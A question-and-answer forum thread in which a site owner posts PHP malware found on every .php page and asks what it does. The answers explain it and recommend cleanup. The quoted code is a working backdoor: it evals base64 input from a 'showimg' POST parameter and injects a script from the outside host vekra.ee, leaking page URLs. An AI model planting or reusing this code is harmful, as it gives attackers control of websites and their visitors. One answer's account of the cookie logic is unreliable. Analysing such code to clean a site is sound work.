What does this php script will do? Is it Malicious php Code?

Question

Can someone please advise what this php code will do? I have found this code on every .php pages only. Other pages like js / css / php.ini are fine. Is this malicious code? If yes, please suggest how to prevent the malicious activity.

Here is the Code:

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

Answer 1

It's more likely it will redirect your every page to attacker website. The @ will halt any errors so you wont get any logs from this script.

You should remove it if you want your site to work properly.

EDIT: it doesn't redirect but it will inject anything it wants on your pages. The second part of the script where it checks for cookies will add a javascript from his website and can do malicious things.

The last part I don't think anyone will be able to guess what is it because it relies on some post variable and that's $_POST['showimg'] , I guess he attacked your website with POST.

Things to do: Change your passwords, check for write permissions on your files, they shouldn't be 0777 , backup database and WordPress Template, delete WordPress install and re-install from scratch. In your template search for his code then add your cleaned template.

Answer 2

I haven't examined it closely, but only the line

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

shows me already that it is, if not malicious, then very very close - there is code injection possible.

Answer 3

Your problem is not the code itself, it's how it got there in the first place. You need to check the write permissions on your files/folders to make sure no one from the outside can modify them.

You mentioned that you're using wordpress, please read this article about hardening wordpress security. I suggest that you lock down your blog (if it's feasible) until you fix your security issues.

Answer 4

im a security analyst and i believe it is redirecting you to a possible malicious website if and only if you do not have that cookie. if you already have that cookie then the script will know you have already been there and possibly researching the malware thus not executing the redirect. The image may be like a detect debugger preset API.. this is just my opinion.